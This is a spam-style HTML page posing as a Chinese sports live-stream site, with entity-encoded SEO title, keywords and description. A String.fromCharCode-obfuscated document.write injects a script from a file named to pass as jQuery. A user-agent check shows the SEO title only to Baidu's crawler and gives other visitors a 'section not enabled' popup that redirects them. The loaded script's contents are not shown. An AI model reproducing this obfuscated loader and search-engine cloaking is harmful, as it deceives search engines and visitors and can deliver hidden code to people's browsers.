<!DOCTYPE html>
<html>
<head><title>9&#x7403;&#x4F53;&#x80B2;&#x76F4;&#x64AD;|&#x897F;&#x7532;&#x76F4;&#x64AD;&#x5728;&#x7EBF;&#x76F4;&#x64AD;</title>
<meta name="keywords" content="&#57;&#29699;&#20307;&#32946;&#30452;&#25773;&#44;&#57;&#29699;&#30452;&#25773;&#36275;&#29699;&#22312;&#32447;&#35266;&#30475;"/>
<meta name="description" content="&#57;&#29699;&#20307;&#32946;&#30452;&#25773;&#24179;&#21488;&#65292;&#22312;&#32447;&#39640;&#28165;&#30452;&#25773;&#35199;&#30002;&#36187;&#20107;&#65292;&#23454;&#26102;&#26356;&#26032;&#27604;&#36187;&#36827;&#31243;&#65292;&#20026;&#24744;&#25552;&#20379;&#26368;&#21450;&#26102;&#30340;&#36187;&#20107;&#36164;&#35759;&#21644;&#31934;&#24425;&#29255;&#27573;&#12290;"/>

<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,106,115,47,106,113,117,101,114,121,46,51,46,53,46,49,46,109,105,110,46,116,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(xt); </script>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="提示"}</script>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
    <meta name="format-detection" content="telephone=no, address=no">
    <title></title>
    <meta name="description" content="">
    <meta name="keywords" content="">
    <style>
        
        html, body{
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
        }
        .mask{
            width: 100%;
            height: 100%;
            background: rgba(0,0,0,.6);
            position: fixed;
        }
        .mask-box{
            width: 80%;
            background: #fff;
            margin: 0 auto;
            position: absolute;
            top: 50%;
            max-width: 600px;
            left: 50%;
            transform: translate(-50%,-50%);
            font-size: 16px;
            text-align: center;
            border-radius:10px;
            box-shadow:0 1px 4px rgba(0, 0, 0, 0.3), 0 0 20px rgba(0, 0, 0, 0.1) inset;
        }
        .mask-box p{
            font-size: 14px;
            padding: 20px;
            margin: 0;
        }
        .mask-box .btn-box{
            display: flex;
            justify-content: space-between;
        }
        .mask-box .btn-box button{
            flex: 1;
            border: none;
            border-top: 1px solid #ddd;
            height: 50px;
            line-height: 50px;

            font-size: 14px;
            background: #2a68c9;
            color: #fff;
            border-bottom-left-radius:10px;
            border-bottom-right-radius:10px;
            box-shadow:0 1px 4px rgba(0, 0, 0, 0.3), 0 0 20px rgba(0, 0, 0, 0.1) inset;
        }
        .mask-box .btn-box button:nth-child(2){
            border-left: 1px solid #ddd;
        }
    </style>
<div class="mask">
    <div class="mask-box">
        <p>栏目未开启</p>
        <div class="btn-box">
            <button class="_closeLayer">确定</button>
        </div>
    </div>
</div>
<script>
    window.onload = function(){
        var btn = document.getElementsByClassName('_closeLayer')[0];
        btn.onclick = function(){
            window.location.href="/";
        }
    }
</script>
</body>
</html>
